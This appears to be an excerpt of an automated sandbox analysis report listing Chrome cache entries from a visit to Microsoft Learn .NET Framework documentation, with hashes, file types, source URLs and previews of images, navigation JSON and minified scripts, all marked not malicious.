                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                                                                                                                            Chrome Cache Entry: 307

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

                                                                                                                                                                                            Chrome Cache Entry: 308

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                                                                                                                            Chrome Cache Entry: 309

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):64291
                                                                                                                                                                                            Entropy (8bit):7.964191793580486
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                            MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                            SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                            SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                            SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                            Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

                                                                                                                                                                                            Chrome Cache Entry: 310

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                                                                                                                            Chrome Cache Entry: 311

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

                                                                                                                                                                                            Chrome Cache Entry: 312

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):33273
                                                                                                                                                                                            Entropy (8bit):4.918756013698695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                            MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                            SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                            SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                            SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                                                                                                                            Chrome Cache Entry: 313

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                                                                                                                            Chrome Cache Entry: 314

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                                                                                                                            Chrome Cache Entry: 315

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

                                                                                                                                                                                            Chrome Cache Entry: 316

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

                                                                                                                                                                                            Chrome Cache Entry: 317

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:HesuCkYn:+s2Y
                                                                                                                                                                                            MD5:8666ACCA900248B6FF53EF1A2F7D34DB
                                                                                                                                                                                            SHA1:9A06EB704EC97A663D9B7AB81586E9B65C7E8F87
                                                                                                                                                                                            SHA-256:FE72C61E5E9D6F17591666FEEBFBDC9D782C1724887401A1EDD1237BEE7D5190
                                                                                                                                                                                            SHA-512:5EA6AC377210A131293A52C48CF843FDEAB3E32FD1E29D6701D479CB78685E4C95962ABF2DFA5FB5EF5F4DBC79BF832C1947F9B551C4F53C081D4A556CBE2792
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkNAwtLDxRgARIFDasRA68=?alt=proto
                                                                                                                                                                                            Preview:CgkKBw2rEQOvGgA=

                                                                                                                                                                                            Chrome Cache Entry: 318

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

                                                                                                                                                                                            Chrome Cache Entry: 319

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

                                                                                                                                                                                            Chrome Cache Entry: 320

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
